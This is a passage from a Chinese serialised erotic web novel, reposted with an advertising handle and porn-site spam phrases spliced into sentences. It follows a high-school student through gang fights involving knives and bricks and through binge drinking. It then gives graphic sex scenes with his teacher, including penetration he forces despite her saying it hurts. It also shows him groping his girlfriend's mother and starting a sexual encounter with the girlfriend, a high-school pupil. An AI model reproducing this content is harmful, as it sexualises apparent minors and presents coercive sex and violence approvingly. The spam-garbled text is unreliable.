广告飞机@pd8999
(都市)马小虎的放荡生涯(全)-28-30
发表于 [2022-10-27]

第一百七十五章 仗义援手
老幺把手里的砖头啪的一下扔到地上,转身就跑。他这一跑,身边的人也跟着跑。这些人还没等动手呢,就都跑的一干二净。
四眼已经倒在了地上,他护住脑袋,身上被人一脚一脚的踹着。被他捅坏羽绒服的人踢的最狠,每一脚都踢在脑袋上,嘴里骂着,“小B崽子,敢捅我!操你妈的,我踢死你……”
四眼已经完全麻木了,他紧紧护住自己的脑袋,蜷缩着身子,大脑一片空白。
马小虎几人走到学府路中段的时候,依然没看到四眼的身影。耗子眼尖,忽然指着对面街道上的一个人喊着,“老幺,老幺……”
老幺光顾着朝前跑,听见有人喊自己的名字,才停了脚步,见马小虎几人在对面,他也顾不得来往的车流,直接跑了过来。
马小虎一见老幺,忙问说,“老幺,四眼呢?”
老幺气喘吁吁的说,“四哥他,他在前面台球厅门口,被人打倒了……”
大智一听就生气的说,“操,他倒了你怎么还跑了呢?有你这么做兄弟的啊?”
老幺一边喘着粗气一边说,“不行啊,智哥,他们太吓人了,我是回来找你们来了……”
马小虎忙说,“别他妈磨叽了,快点带我们去……”
几人一边朝前跑,马小虎一边问老幺,“刀疤威他们多少人?”
老幺一愣,才明白马小虎以为四眼和刀疤威干上了呢,他忙解释说,“不是刀疤威,这几个人我们也不认识啊……”
耗子边跑边说,“这个他妈四眼,不认识怎么还能打起来呢……”
快到地方时,马小虎就看见几个人正围着踹四眼呢,还有个人蹲在一旁,手里拿着四眼掉在地上的匕首。乡土尛说網手打马小虎忙加快脚步,边跑边喊,“操你妈的,都给我住手……”
马小虎这一喊,这些人果然都停了手,回过头看着马小虎他们。包知道一看悄声说,“小虎,不好,这几人是二中的六狼,是二中老大张天奇的人……”
马小虎也没管那些,一到跟前,他拎着铁南傍国就要往前冲,一直蹲在四眼身边的人拿着匕首顶在四眼的大腿上,看着马小虎,一脸不屑的表情,“小B崽子,你往前走一步,我就给他一刀,你动一下试试?”
马小虎马上停下了脚,他拿着铁南傍国指着那人,“你要是敢动他一下,我他妈肯定不会放过你……”
这人就是六狼中的老大,大狼。他嘿嘿一笑,“是吗?怎么不放过啊?”
说着拿刀在四眼身上一划。四眼身上的棉服就划开一道口子,里面白花花的棉花露在外面。
大狼看着马小虎,冷笑说,“你再多说一句话,我就不往他衣服上划了,我在他肉上划……”
马小虎不敢再出声,他能看的出来,这人绝对不是再说着玩。
那个叫老六的指着马小虎问,“你们都是职高的?”
马小虎瞪着他点了点头。
“你叫什么名?”
“我叫马小虎,你们快点放了他……”
马小虎话音刚落,这几人就互相看了一眼。大狼忽然把匕首逼在四眼的大腿处,略一用力,匕首尖就刺透裤子,紧挨着大腿。他目露凶光,盯着马小虎,冷笑一下,“你他妈就是马小虎啊?找你还找不到呢,今天自己送上门了。把你们手里的东西都给我扔了……”
马小虎听他话里的意思是一直想找自己,可他并不认识这几个人。他略一犹豫,并没马上把南傍国扔了。
他这一犹豫,大狼手上却加了力度,刀尖刺破了四眼的大腿,大腿疼的“哎呀”一声。
马小虎立刻把手里的铁南傍国扔在地上,嘴上喊说,“我他妈扔了,你别动他……”
老六又指着周子安几人,“你们都他妈扔了……”
众人无奈,只好把手里的家伙全都扔在地上。
大狼盯着马小虎说,“马小虎,你留下,其他的人都走吧……”
大智几人楞了下,没想到这人会提这样的要求,他们谁也没动。
大狼哼的冷笑下,“用我再说一遍吗?”
马小虎马上回头对几人说,“你们先走,我看他们要干什么?”
周子安忙说,“不行,不能把你留这儿……”
正僵持着,忽然从旁边的饭店出来三个人,两男一女。被女孩儿挎着胳膊的正是陈功,而另外一个则是邰振涛。
他走到跟前,看着二中的几个人,“操,这不是六狼哥几个吗?”
马小虎见是陈功,暗想上次自己用阴招偷袭了他,这次被他遇到了,他还和对方认识,心里就觉得事情不好。
邰振涛嘴里叼着牙签,看着马小虎,“这不马小虎吗?怎么挨揍了?”
马小虎笑了下没吭声。蹲在地上的人这才站了起来,但他的脚还始终踩着四眼,他看着陈功笑下说,“这不是功哥吗?怎么这么闲着呢?”
陈功也没回答,反倒看着他脚下的四眼说,“这是我们职高的学生啊?怎么得罪你们六狼了?”
大狼看着陈功,“这小子拿刀捅我,你说我是不是得教训教训他……”
陈功点了点头,半蹲着身子,看着躺在地上的四眼。又仰头看着大狼,“这教训的够可以的了,我看行了吧?”
大狼反问说,“行了?你没看那几个还虎视眈眈的吗?你们职高现在可真牛B啊,这群小B崽子整天拎着南傍国在大街上晃,我替你们陈老大管管……”
陈功冷笑下,“你替子笑管?好像轮不到你吧?大狼,那你的意思是我说话不好使呗?你是不想给我这个面子了?”
大狼没说话,脸上有些为难。陈功头也不回的对马小虎说,“马小虎,你们把地上的南傍国都给我捡起来……”

第一百七十六章 六狼三鹰
几人一听,忙低身把铁南傍国都捡了起来,做好随时动手的准备。"乡土尛说網手打大狼盯着陈功,“陈功,你什么意思啊?天奇和陈子笑可说过的,咱们两伙停战……”
大狼话没说完,陈功就打断他,指着四眼说,“既然停战你这是干什么呢?小孩子不懂事,你教训下就可以了,没完没了可就没意思了?”
大狼看着眼前的局势,明显是对自己不利。他之前和陈功打过几次,太了解陈功和邰振涛的实力了。外加马小虎几人拿着铁南傍国,一副随时要冲过来的样子。想到这些,大狼就笑着把腿从四眼的身上抬了下来,看着陈功说,“既然你都这么说了,这面子我肯定得给你。你们回去好好管教管教这群小崽子,别一天没大没小的……”
陈功见他已经说这话了,就给他个台阶下,“放心吧,该管的我们回去肯定管……”
大狼刚要走,陈功却忽然喊住大狼,“大狼,你回去给太监那几个小崽子带个话,就说我陈功要是遇到他,一定让他变成真太监……”
大狼这才招呼另外几人转身走了,临走前他特意回头又看了看马小虎。
耗子和杨达壮忙跑过去扶起四眼。四眼大伤倒没有,只是脑袋被踢的起了几个包,脸上踹掉了几块皮,外加大腿上挨了一刀,但基本就是破了皮,也没什么事。
马小虎走到陈功面前,不好意思的笑了笑,“谢谢你啊,今天多亏你了……”
陈功盯着马小虎,忽然伸手一把抓住马小虎的下身,马小虎疼的嗷嗷直叫。周子安几人也只能无奈的看着,根本帮不上忙。
陈功看着马小虎说,“小兔崽子,我也让你尝尝这滋味,好受不?”
马小虎弯着腰,嘴里“嗷嗷”直叫,“陈功,我服了,我服了……”
陈功咬着牙,一副凶恶的样子,“你他妈叫我什么?”
马小虎连忙求饶,“功哥,我错了,我错了……”
陈功嘴里说着,“幸亏你功哥我还是金枪不倒,不然我他妈给你捏碎了……”
说完才松开手。
邰振涛在一旁微笑看着马小虎,转头对陈功说,“行了,走吧……”
陈功瞪了马小虎一眼,三人转身走了。
四眼还是一脸的不高兴,他一言不发,正用纸巾擦着脸上的鞋印。马小虎捂着下身,走到他跟前,“四哥,我错了,今天这事愿我啊,要不是我磨叽,四哥你也不能吃这么大亏,你看我都被陈功弄这样了,你就别生我气啦?四哥,我跟你保证,以后这样的错误我肯定不犯……”
四眼故意绷着脸,耗子在一旁说,“操,想笑就笑呗,憋着不难受啊?”
四眼“噗嗤”一下笑了出来,“操,我都被打成这B样了,你们还他妈逗我……”
周子安在一旁笑说,“行了,小虎,四哥都原谅你了,你就直起腰吧。”
马小虎还哎呦着,“陈功这个犊子,下手真他妈狠,疼死我了……”
四眼也不管马小虎疼不疼,在一旁嘟囔说,“我他妈中午还没吃饭呢……”
大智接话说,“操,正好我中午也没吃饱,让小虎请咱们……”
马小虎手一挥,“妥了,走,就羊肉串了,学校那面新开一家,味儿挺好……”
几人到了烧烤店,四眼却让耗子陪他出去一趟,也不说干什么,让他们先点吃的。
好一会儿,两人才回来。几人看着四眼哈哈大笑,原来他去了理发店刮了个秃子。大智坐在门口,一双大手在他脑袋上摸了两下。四眼忙把他手推开,“别JB摸,脑袋还疼呢……”
大智哈哈大笑,“这JB头剃的,真他妈亮……”
众人跟着大笑。四眼郁闷的坐在那儿,拿起一串羊肉串就开始撸,边吃边说,“操他妈的,今天要不是被人薅了头发,我肯定能干那个叫大狼的一刀。这回我他妈刮了,我看谁还能薅了……”
周子安一听,转头问小虎,“这几人是谁啊?他们怎么也要找你呢?”
马小虎茫然的摇摇头,“我也不知道,他妈的,这学上的,到哪儿都有仇人……”
包知道接话说,“这几人叫六狼,把兄弟六个,在二中很有名。都是跟二中老大张天奇在一起的,还有三个人叫‘三鹰’。六狼三鹰在二中一提没人不知道。他们和陈子笑打过一阵子,后来张天奇找陈子笑讲和,两伙就再没打过。只是不知道他们为什么也要找小虎……”
耗子插话问,“那个刀疤威和太监呢,也是张天奇的人?”
包知道摇摇头,“这个我不知道。但刀疤威他们的实力没法和六狼三鹰比,那根本就不是一个档次的……”
杨达壮话不多,他喝了一口啤酒,看着马小虎,“小虎,你真得小心点儿,我看现在想要找你的人太多了……”
大智一口把面前的啤酒干了,不服的说,“操,怕啥啊?兵来将挡,不服就干。管他什么六狼六狗的呢……”
四眼马上接话说,“我就佩服大智这一点,一点不磨叽,想干就干。不像有的人,打个架还磨磨唧唧的,要不然我今天能挨揍吗?”
马小虎马上端起酒杯,“四哥,我再给你承认一遍错误,你教训的对,我肯定改,我先干了……”
说着酒杯把啤酒干了。
桌上的人都知道马小虎一点错都没有,他是故意在哄四眼开心。但四眼却不这么认为,他就觉得今天挨打就是因为马小虎的磨叽造成的。他一杯一杯的喝着酒,迷迷糊糊的和身边的老幺说,“老幺,我告诉你,别看你今天跑了,我不怪你……”
老幺尴尬的笑笑,解释说,“四哥,我哪是跑啊,我是回去叫人去了……”

第一百七十七章 雪夜醉酒
四眼把杯里的啤酒又干了,老幺忙给他倒满。四眼搂着老幺的肩膀,打着酒嗝说,“你听我给你讲啊,老幺,你叫不叫人四哥也不怨你。我就告诉你一句话,你给我记着……”
老幺忙点头说,“四哥,你说,我听着呢……”
四眼眼皮已经开始耷拉着,他明显喝多了,“求人不如求己,你懂吗?以前在班级的时候,你打过我,长毛打过我,肖凯也他妈打过我……但现在,我问你,谁他妈敢打我?所以我和你说,打铁还需自身硬。现在谁他妈打我我就敢捅死他,你回去把这帮兄弟都给我叫着,明天我带你们出去打架去,都好好练练……”
老幺也不敢和四眼顶嘴,就连连点头。
耗子端着杯和马小虎碰了下,“四眼喝多了,咱们喝……”
说着两人干了。
马小虎今天的兴致也很高,他不停的和身边的人碰杯,一杯杯的干着。
大智和杨达壮更是叫上了劲,谁也不服谁,用杯觉得不过瘾,两人干脆对着瓶子吹上了。
周子安也有些喝多了,他看着大家拼酒,端着杯和马小虎碰了下,舌头发硬的说,“小虎啊,你说的都对啊,什么他妈老不老大的,有这些兄弟重要吗?我多亏没当什么老大,才有了你们这些兄弟,我周子安知足了。来,干……”
两人把杯里的酒干了。马小虎也大着舌头问周子安说,“子安,你是不是喜欢冯晓幽啊?用不用我去帮你说说?”
周子安靠在椅子靠背上,眯着眼睛看着棚顶,呵呵傻笑,“我是挺喜欢那小丫头的,你可别去说啊,我丢不起那人,我一见她我他妈连话都不敢说,你说我是不是挺丢人的?”
马小虎眼皮也耷拉下来,舌头发硬,迷迷糊糊的说,“嘿嘿,你这点就不如我,我他妈一见女的话就多,越漂亮我就越能说。不过那个刘沐白一直追冯晓幽呢吧……”
周子安摆摆手,“他白扯,我看那小丫头对你挺有意思的……”<中文字幕br>马小虎连连摇头,大着舌头说,“我就拿她当妹妹,就像林琳是我姐一样,特亲的那种,以后你就是我妹夫……”
两人说着都哈哈傻笑。
林琳挎着殷东方,两人正在综合楼后的树林里散步。天空不知什么时候开始飘起了雪花,路灯也已经亮了起来。借着灯光,林琳就抬头看着飘飘洒洒的雪花。
殷东方知道林琳喜欢雪,他就陪着她一直站着。不时的用手把林琳头发上的雪拂掉。乡土尛说網手打林琳轻轻靠着殷东方的肩膀,柔声说,“东方,刘沐白找你是亚洲乱码无码永久不卡在线不是因为照片的事?”
殷东方笑笑没说话。林琳继续问,“你是不是不高兴了?”
殷东方把脸在林琳的头发上轻轻蹭了下,“不是不高兴,只是有些吃醋……”
林琳一听咯咯笑了,“那你怎么不问我到底怎么回事呢?”
殷东方笑笑,“不问。”
“为什么?”
殷东方把林琳的身子扶正,看着林琳说,“因为我相信你……”
林琳笑了,很开心,但她还是问说,“那为什么还会吃醋?”
殷东方嘴角上扬,有些嫉妒的说,“因为我之前都没和你拥抱过啊……”
林琳哈哈大笑,“你这个答案我喜欢。但我是不是让你丢脸了,现在全校都知道这件事情……”
殷东方也笑了,笑容中满是骄傲,“全校知道了能怎么样?就是全天下都知道又能怎么样?你林琳不还照样是我殷东方的女朋友吗?”
林琳感动的靠在殷东方的胸前,“你想过是谁这么做的吗?”
殷东方轻轻抱着林琳,“想过,想不到是谁。但我知道这人的目的不是你和我,而是马小虎。他是想挑拨我来对付马小虎……”
林琳点点头,“我也是这么想的,你说会不会是韩宇和老黑?”
殷东方轻轻摇了摇头,“感觉不像,至少我觉得他们没有那么大的胆子敢去动你……”
殷东方说着在林琳的头发上轻轻亲了亲,尽管亲到的都是雪,但他依然觉得很幸福,“其实我还是要感谢马小虎的……”
林琳好奇的问,“为什么?”
殷东方迷人的微笑下,“没有他你也不会这么快答应我的……”
从烧烤店出来,大家都已经喝多了,走路都摇摇晃晃的。几人互相搭着脖子,顶着大雪,趔趔趄趄的朝学校走去。
马小虎第一次喝这么多酒,他看着身边的耗子,大着舌头说,“操,耗子,你别晃荡,我迷糊……”
耗子嘿嘿傻笑,“你是喝多了,我哪晃了?”
说完脚下一个趔趄,险些倒在地上。
马小虎哈哈大笑,“你才喝多了呢,都不会走路了。哪天咱俩单独喝,看谁能喝过谁?”
马小虎不会想到,他的一句哪天,却要等到几年之后。在这几年中,马小虎滴酒不沾,他就为了等一个人一起喝,一起醉,这人就是耗子。
马小虎很长时间都在想一个问题,假如那天他们没喝酒,或者没喝多,后面的事情会不会发生。马小虎再想这个问题时,他还不知道,生活就是生活,没有谁能来安排,更不会有假如。
几人到寝室楼,马小虎憋不住,站在墙根就开始撒尿。其他几人都先回了寝室。马小虎刚尿完,口袋里的手机就响了,拿起一看,是一个陌生的号码。一接起来,对面一个女声说,“小虎,我是闻文,你让你朋友来接我,你怎么不来?”
马小虎一愣,“闻文,你嗓子怎么哑了?我没让谁接你啊?”
那面回答说,“我这两天感冒了,他们说是你朋友啊,说你正喝酒呢……”
马小虎一听酒醒了大半,忙说,“你让他接电话……”
电话那头一个低沉的声音传来,“马小虎,我是老黑,酒没少喝吧?”

第一百七十八章 香闺纵欲(一)
马小虎一听是老黑,他心一下悬了起来,他警告老黑说,“老黑,你他妈要敢动闻文一下,我一定整死你……”
老黑哼哼冷笑下,“没人会动她,我们都在等你呢,但你要不来,那可就不一定了……”
马小虎忙问,“你们在哪儿?”
老黑回答说,“人民公园东门广场,马小虎,你最好是一个人过来,人多有些事情可就不好办了……”
放下电话,马小虎疯狂的朝校外跑去。他站在路边,正朝着出租车招手。手机又响了,他以为还是老黑,可拿起一看居然是韩梅。接起电话,韩梅沙哑着嗓子,一听就是刚睡醒的声音,“小虎,你睡了吗?”
马小虎就撒谎说刚和同学吃完饭,准备回寝室。韩梅听出他好像喝酒了,揉着眼睛说,“这么晚了,你要是喝酒了就别回寝室了……”
韩梅的一句“这么晚了”一下让马小虎的脑袋清醒很多。他忙对韩梅说,“你先等下,我一会儿给你回电话。”
马小虎挂了电话就给闻文打了过去,按正常来讲重点高中管的那么严,这个时候闻文不可能被老黑他们接出来的。
电话打了好半天才接通,马小虎忙着急的问,“闻文,你在哪儿了?”
闻文见是马小虎来的电话,她很高兴,撒娇的说,“我学习呢,都累死我了,你怎么这个点给我打电话?”
马小虎一颗悬着的心这才放下,“没事,想你了,看你干什么呢?”
闻文撒娇的小声说,“我也想你了,这周我回家,你能去吗?”
马小虎想想说,“我倒是能去,关键你爸不是在家吗?”
闻文低声笑说,“他出门要账去了,刚走……”
乡土尛说網手打马小虎心里一阵兴奋,“那行,我去……”
两人又腻了一会儿才挂了电话。
马小虎又给韩梅打了过去,贱兮兮的说,“亲爱滴,我不想回寝室了,去你那儿行不行?”
韩梅打着哈欠,嘟囔说,“那你就过来吧,快点啊,我都困死了……”
马小虎打车直奔韩梅家,心想让老黑他们等着吧。
老黑带着一群人在公园广场上冻的瑟瑟发抖,肖凯跺着脚问说,“马小虎不会不来吧?”
老黑摇摇头,“不会,我表弟说马小虎和这个闻文初中就在一起了,我因为她还去打过马小虎呢……”
韩宇一边抽烟一边说,“还不如让你表弟直接把这女的约出来呢,刚才我看清清装的有点不太像……”
老黑缩着脖子,冻的丝丝哈哈的说,“要是能约出来还费这劲了,人根本不搭理他,再等等吧……”
老黑为了做这个局,等了好长时间,他天天让人盯着马小虎,以为今天马小虎喝多了可以得手,哪想到被马小虎无意间识破了。
韩梅穿着睡衣,睡眼惺忪的给马小虎开了门。一进卧室,马小虎就把自己脱的溜光,丝丝哈哈的钻进被窝,搂着韩梅。韩梅马上把他推开,“别碰我,你手脚都冰凉的……”
韩梅越说,马小虎就越紧紧抱着她。韩梅躲不过去,就把两脚放在马小虎的脚上,帮他捂着。
韩梅看着马小虎,问说,“晚上是不是和马心语一起吃的饭,她今天刚回来,你们帮她接风?”
马小虎把手伸进韩梅的睡衣,在高翘的臀部上摸着,“没有她,就和耗子和周子安他们……”
韩梅哼了一声,“你当心点,要是我知道你和她在一起,你看我怎么收拾你的……”
马小虎想起早晨韩梅收拾自己的情景,他一下翻身趴在韩梅的身上。压的韩梅“哎呀”一声。
对于韩梅,马小虎唯一能报复的做法就是在床上狠狠的弄她。平时就都是敢怒不敢言。
马小虎把韩梅的睡衣掀了起来,韩梅睡觉时内裤已经脱了。马小虎扶着坚硬直接就对准花瓣。
韩梅见马小虎直接就要进来,忙说,“不行,太干了,该疼了……”
马小虎心里想的是,谁让你打我了。但嘴上却说,“没事儿,一会儿就湿了……”
说着就挺起屁股直接往里面插。花瓣处的确太干,马小虎这一动也不过就进去了头,韩梅紧着鼻子,皱眉说,“你个混蛋,有点疼了……”
这要是平时马小虎一定会怜香惜玉,可他今天就想折磨韩梅一下。他挺着屁股,大力的前插,费了很大劲,坚硬也只是才进去了一半。
韩梅吭吭哧哧的喊着疼,她两腿尽量朝外分开。马小虎借着她劈腿的那一瞬,猛的一用力,坚硬撕开紧凑的肉壁,齐根进入。
韩梅疼的“哎呀”一声挺起了上身,她瞪大的眼睛盯着马小虎。马小虎也觉得自己有些过分了,老实的趴在那儿,不敢再动。
韩梅看着马小虎,问说,“你是不是因为我不让你找马心语,你故意这么对我的?”
马小虎忙解释说,“怎么能呢,这样你不舒服啊?”
韩梅摇摇头,盯着马小虎,“一点儿都不舒服,除了疼,没有别的感觉……”
马小虎看着韩梅的样子,心里有些不忍。就趴在她耳边轻声说,“你闭上眼睛,我马上就让你舒服……”
韩梅就闭上了眼睛。马小虎在韩梅的耳边低声说,“亲爱的,你现在就开始想象,想我的小弟弟在你的小妹妹里面进进出出的……”
他话音刚落,韩梅“噗嗤”一下笑了。马小虎忙说,“你别笑,认真点。我正帮你进入状态呢……”
韩梅点点头,忍住了笑。马小虎继续说,“你的小妹妹张开了小嘴,她就是为了迎接我的小弟弟。小弟弟进去时,小妹妹觉得有些疼,还有些痒。她就把小嘴慢慢长大,含住了小弟弟,小弟弟就用力的插在里面……”

第一百七十九章 香闺纵欲(二)
韩梅听着马小虎的话,脸越来越红,她开始轻轻扭着身体,两手放在马小虎的屁股上,花心中也慢慢的开始潮湿。她忽然轻声嘟囔说,“小虎,你动啊……”
乡土尛说網手打马小虎动了两下,问说,“你应该叫什么?”
韩梅闭着眼睛,嘴角挂着微笑,“亲爱的……”
马小虎不满意,“叫老公……”
韩梅就听话的轻声喊说,“老公,小虎老公,快动啊……”
马小虎一边动一边问,“你还打不打我了?”
马小虎的话一下把韩梅逗笑了,想想自己也是太愿意对马小虎动手了。就睁开眼睛,娇声喘着,搂着马小虎的脖子柔声说,“不打了,再也不打我老公了……”
马小虎这才满意。他直起了身子,把韩梅的一双玉腿抗在肩上,再将身子前倾,韩梅的身子就折成了一个锐角。
马小虎最喜欢和闻文用这个姿势,主要原因是闻文的身体很软,能随意摆弄。
韩梅虽然没有闻文那么软,但也还不错。马小虎就开始大开大合的动上了,这个姿势插入比较深,坚硬每一次都能深插入底。
韩梅张嘴大口的喘息着,不时发出嘤嘤的呻吟声。身下粉嫩的花瓣完全开放,随着坚硬的抽动,一张一翕着。胸前丰满的乳房随着马小虎的抽插也开始摇晃着,像一波美丽的浪涛,微微起伏。
马小虎感觉韩梅的花心的肉壁又开始蠕动起来,朝着自己的坚硬紧紧挤压。马小虎动的越快,收缩的力度就更大。
韩梅歪着头,急促的喘息着,鼻孔不时的发出“嗯嗯”的呻吟声。马小虎见她此时的媚态,和平时在学校里冷冰冰的样子截然相反。马小虎就故意用语言刺激她,“亲爱的,舒服吗?”
韩梅闭着眼睛嗯了一声。马小虎不满足,继续问,“哪儿舒服?”
韩梅抿着嘴不说话。马小虎把坚硬朝外慢慢抽出,到洞口时又猛的一下推进,嘴里喘着粗气问,“说啊,哪儿舒服?”
韩梅微微张着嘴,喘息说,“哪儿都舒服……”
马小虎嘿嘿一笑,开始变化抽插的节奏。他把坚硬放在洞口,时而猛的一下拼命前冲,时而轻缓的往前送入。
韩梅的呻吟声越来越大,她身子开始抖动,花瓣也开始不停的收缩。马小虎知道韩梅这是要来高潮了,他开始大力抽动,每一亚洲欧洲美洲无码精品下都深入花心。
韩梅紧紧握着拳头,感觉整个人都轻飘飘的,忽然她把身子向上一挺,大声的尖叫了一声,然后就像停止呼吸一样。好半天才发出一声悠长绵软的呻吟。
韩梅感觉整个人都瘫软了,她两眼迷离的看着马小虎,嘟囔说,“快把我腿放下来,累。”
马小虎把双腿放下,趴在韩梅的身上。韩梅搂着他吭吭的撒娇说,“小虎,你怎么还没来啊?”
马小虎一是由于早上做过,再有今天喝了不少酒,他一点要射的欲望都没有。
他见韩梅已经从高潮中缓过来了,就拔出坚硬对韩梅说,“来,你把身子侧过来……”
韩梅就把身子侧在床上,问说,“你要干什么啊?”
马小虎也不说话,他举起韩梅上面的大腿,他坐在下面的大腿上,扶着坚硬慢慢的插了进去。
韩梅轻轻嗯了一声,皱着眉头说,“你就变着法的折磨我吧……”
这种插入的方式马小虎也是第一次试,倒可以深入,但却用不上太大的力,正好适合韩梅这样高潮刚过的,这样可以慢慢升温。
马小虎一边动着,手一边抓住韩梅胸前丰满的乳房,随意揉捏。韩梅低头看着自己的乳房在马小虎的手里变化着形状,一边轻声吭吭着,一边问马小虎说,“小虎,你都在哪儿学的这些乱七八糟的姿势啊……”
马小虎一边动着,一边吹嘘说,“像我这么聪明还用学吗?完全是无师自通,自学成精……”
韩梅撇了下嘴,用腿在他脑袋上轻轻踢了下,“快点吧,我太累了……”
马小虎也知道像韩梅这么始终举着腿的确很累,他动着也用不上力气。就把坚硬拔出,在韩梅的屁股上拍了拍。两人多次的做爱,早已熟悉对方的意思,韩梅就把在床上,把雪白的屁股高高撅起,嘴里说着,“你快点吧,明天还得早起呢……”
马小虎两手在高翘的臀部揉捏两下,他忽然用力的分开臀瓣,把坚硬对准韩梅的嫩菊,他就是想和韩梅闹下。以为韩梅肯定会扭身骂他。结果韩梅根本没动,马小虎就用坚硬在上面顶了下,韩梅还没动。
马小虎就故意说,“我从这儿进了?”
谁知韩梅噗嗤下笑了,“我才不信你能进去呢……”
韩梅虽然也知道后入之说,但她始终觉得不太可能。马小虎被她一说,两手用力的掰着臀瓣,挺着屁股猛的向后门插入。他这一插很用力,但也只不过是微微推进了几厘米而已。就是这几厘米就让韩梅疼的啊啊大叫,身子前倾,远离马小虎的坚硬,“不行啊,太疼了……”
韩梅也只是一时好奇,哪想到居然这么疼。马小虎嘿嘿坏笑着,把韩梅身体扶正,“还是从下面来吧,小屁股太紧了,进不去……”
说着,挺动下身直接插入花瓣之中。他一进去,就开始连连冲撞,争取让自己早点出来。韩梅也配合着把屁股向后顶着。
马小虎越动越快,每一下动用力的撞在韩梅的屁股上,房间里就充满着“啪啪”的声音。韩梅感觉马小虎好像快来,就娇喘着,故意对他说,“亲爱的,啊,再快点……”
马小虎忽然感觉坚硬的前端被韩梅的花心紧紧裹着,他头皮发麻,坚硬不受控制的跳动着,他闭着眼猛烈抽动,一股股精华就都射到韩梅的花心中。

第一百八十章 闻文家中
激情过后,马小虎的酒劲也开始上涌,加上刚才的剧烈运动,就感觉眼皮发软,有些困意。乡土尛说網手打但韩梅却很精神,她搂着马小虎,轻声说,“小虎,我有个事情想和你商量?”
马小虎楞了下,韩梅和他很少用商量的口气,一般都是命令。他有些奇怪的问,“什么事?你不会是还想再来一次吧?”
韩梅在他肚皮上拍了下,“什么啊,你脑子里就想这些事。是我有个初中同学年底要从北京回来,说要聚一聚……”
马小虎奇怪的问,“那就聚呗,怎么了?”
韩梅有些为难的说,“关键她说都要带男友,没男友也得带一个男伴,我就和她随口说带个男学生,她居然同意了……”
马小虎惊讶的“啊”了一声,问说,“你不会是想带我去吧?”
韩梅看着他笑着点了点头。
“那你怎么介绍我啊?”
韩梅乐了,“我这同学是个花痴,我就说你是我学生中最帅的一个……”
马小虎又问,“你就不怕我给你丢人?”
韩梅点点头,“怕!”
“那你还让我去……”
韩梅摸着马小虎的脸说,“我想好了,你就以我的学生和干弟弟的身份去。到时候不许乱说话啊……”
“能不去吗?”
马小虎问。
韩梅瞪着他,摇摇头,“不能。”
马小虎“哦”了一声,心想这哪是商量,这还是命令。
第二天一回到学校,耗子几人就问马小虎跑哪儿去了。四眼插话说,“我昨天就说了,你们根本不用问,他肯定是去找马心语嘿咻去了……”
杨达壮看着马小虎,“你可不知道,昨天耗子喝多回寝室一顿闹啊,就说你被人打了,要去救你呢。把我水杯和水壶都给摔了……”
耗子嘿嘿笑下,不好意思的说,“喝多了,喝多了……”
马小虎笑下,就把昨天老黑给他打电话的事情讲了一遍。几人一听哈哈大笑,都骂老黑这个SB。四眼最坏,让马小虎给老黑打个电话逗逗他。
马小虎拿出手机按之前的号码拨了过去,结果一接通就被那面挂断了。马小虎又发了一条短信过去,“老黑,我昨天去了,你们怎么没在啊?都冻死我了……”
不大一会儿,手机短信震动,老黑回了短信,就四个字,“滚你妈的。”
几人对着短信哈哈大笑。老黑却在寝室裹着厚厚的被子,连打几个喷嚏,他昨晚冻感冒了。
老黑把手机扔到一旁,嘴里自言自语的说,“操你吗的,马小虎,老子早晚弄死你……”
闻文周末一到家,进门就对李雪说,“妈,今天小虎来,你做点好吃的吧……”
李雪心里咯噔一下,有些复杂,她既希望,又担心。她看着闻文,话里有话的说,“闻文,你现在可是大姑娘了,和男孩子交往方面你得注意啊,千万别糊涂做傻事,你现在是学习要紧……”
闻文脸一下红了,有些不高兴的看着李雪,噘嘴嘟囔说,“我就说小虎要来,你就教训我,那我告诉他别来了……”
闻文一个月才回来一次,李雪也不想惹她不高兴,忙说,“妈妈不是那个意思,说的都是为你好,你快去洗澡吧,我做饭去了……”
马小虎来时,闻文正在洗澡。李雪看着马小虎手里居然还拎着水果,心里暗想这浑小子是长大了,比以前懂事多了。
马小虎放下水果,跟着李雪进了厨房。一进厨房,他就从后面抱着李雪,脸在李雪的头发上蹭着。
李雪好像习惯了似的,就由着他在抱着,她该干什么就干什么。马小虎见李雪没反应,就把两手放到她的胸前,隔着睡衣摸着她胸前硕大的乳房。李雪扭了下身子,小声说,“去,别乱摸……”
马小虎嘿嘿一笑,“想没想我?”
李雪也不搭理他。马小虎就用下身在李雪的屁股上蹭着。虽然隔着裤子,李雪也还是感受到了他的下身已经硬了起来。她就回头看着马小虎,商量他说,“小虎,你一会儿和闻文好好聊天,不许干别的啊?”
马小虎两手在胸前用力的揉搓着,嘿嘿笑说,“那我和你干行不行?”
李雪叹了口气,“哎,我敢说不行吗?被你这么个冤家给缠上了……”
闻文洗完澡,到了厨房,见马小虎和李雪正聊天,她就问说,“你们两个说什么呢?”
马小虎回头看着闻文,她正侧歪着脑袋擦头发呢。闻文只穿了件粉色的吊带睡衣,雪白的双肩露在外面。白嫩的小脸因为刚洗过澡的原因,脸颊显得粉嘟嘟的。她没带胸罩,胸前坚挺的乳房在睡衣中若隐若现。睡衣的下摆很短,还不到膝盖。一双修长的美腿大部分都露在外面。
李雪见闻文穿成这样就出来了,心里暗暗叫苦,她回身尽量委婉的对闻文说,“厨房油烟大,你刚洗完澡,快出去。去多穿点儿,别感冒了……”
闻文一边往出走一边说,“我一点都不冷,还热呢……”
马小虎转身要跟闻文出去,李雪却把他叫住,低声说,“小虎,别忘了你刚才答应我的事啊……”
马小虎此时的心里已经完全长了草,他在李雪的屁股上掐了下,“我记得呢……”
说完转身出去钻进了闻文的卧室。
闻文一见马小虎进来,就笑意盈盈的看着他,拉着马小虎的手,“小虎,咱们两多久没见了?”
马小虎一手环抱着闻文的细腰,一边想说,“快两个月了……”
说着低头朝着闻文的朱唇上吻去。闻文踮着脚尖,两手搂在马小虎的脖子上,用力的吮吸着马小虎的舌头。似乎要把这两个月的思念都亲吻出来。

第一百八十一章 母女同室(一)
马小虎一边亲吻着,一边把睡衣向上拽,一手伸进闻文的内裤,在她粉嫩的屁股上揉摸着。乡土尛说網手打闻文感觉自己呼吸都困难了,她歪着头靠在马小虎的肩上,她担心李雪会突然闯入,就轻声说,“晚上等我妈去打牌我们再来,行吗?”
马小虎却不管这些,他坐在床上,把闻文抱在怀里,隔着睡衣,一手在她坚挺的乳房上揉着,不时的用手指在上面的玉粒上轻轻捏上几下。
一股麻痒的感觉传遍闻文全身,她轻轻扭动几下身子,急促的呼吸着,嘴里央求说,“小虎,我怕我妈进来啊……”
闻文担心,但马小虎却不担心,他问说,“你应该叫我什么啊?”
闻文娇羞的笑下,把头趴在马小虎的耳边,呼吸若兰,轻声说,“爸爸,老公爸爸……”
